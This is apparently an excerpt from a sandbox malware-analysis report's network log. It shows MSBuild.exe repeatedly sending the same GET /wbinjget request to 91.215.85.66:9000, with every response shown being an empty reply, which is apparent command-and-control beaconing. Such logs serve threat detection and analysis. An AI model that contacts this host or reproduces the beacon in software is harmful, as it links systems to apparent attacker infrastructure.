Apr 26, 2024 10:28:18.171020985 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49809	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:18.563409090 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:18.844553947 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:18 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49810	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:19.232871056 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:19.508675098 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:18 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49811	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:19.892649889 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:20.173074961 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:19 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49812	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:20.574338913 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:20.856146097 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:19 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49813	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:21.252530098 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:21.817521095 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:20 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49814	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:22.209117889 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:22.491107941 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49815	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:22.887607098 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:23.171302080 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:22 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49816	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:24.090585947 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:24.377130985 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:24 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49817	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:25.085916042 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:25.369600058 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:25 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49818	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:25.882133961 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:26.601492882 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49819	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:26.984492064 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:27.259443998 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:26 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49820	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:27.651335001 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:27.951683044 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:27 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49821	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:28.346600056 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:28.631959915 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:27 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49822	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:29.024849892 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:29.306401014 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:28 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49823	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:29.703572989 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:29.982466936 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49824	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:30.367033958 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:30.648207903 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49825	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:31.033216953 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:31.314527035 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:30 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49826	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:31.702678919 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:31.983583927 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:31 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49827	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:32.378261089 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:32.669456959 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:31 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49828	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:33.068186998 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:33.362977982 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:32 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49829	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:33.742324114 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:34.016231060 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49830	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:34.394567966 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:34.669229031 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49831	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:35.045726061 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:35.319119930 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49832	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:35.701981068 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:35.977092981 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49833	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:36.356638908 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:36.632646084 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:35 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49834	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:37.017375946 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:37.297935963 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:36 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49835	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:37.688400984 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:37.976068974 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:36 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49836	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:38.360265970 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:38.650655031 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:37 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49837	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:39.054796934 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:39.342207909 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49838	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:39.728547096 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:40.005814075 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49839	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:40.402705908 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:40.698354006 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:40 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49840	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:41.481245041 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:41.758097887 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:41 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49841	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:43.051465034 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:43.329742908 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:42 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49842	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:43.750201941 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:44.120699883 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:43 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49843	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:44.501149893 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:44.777571917 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:44 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
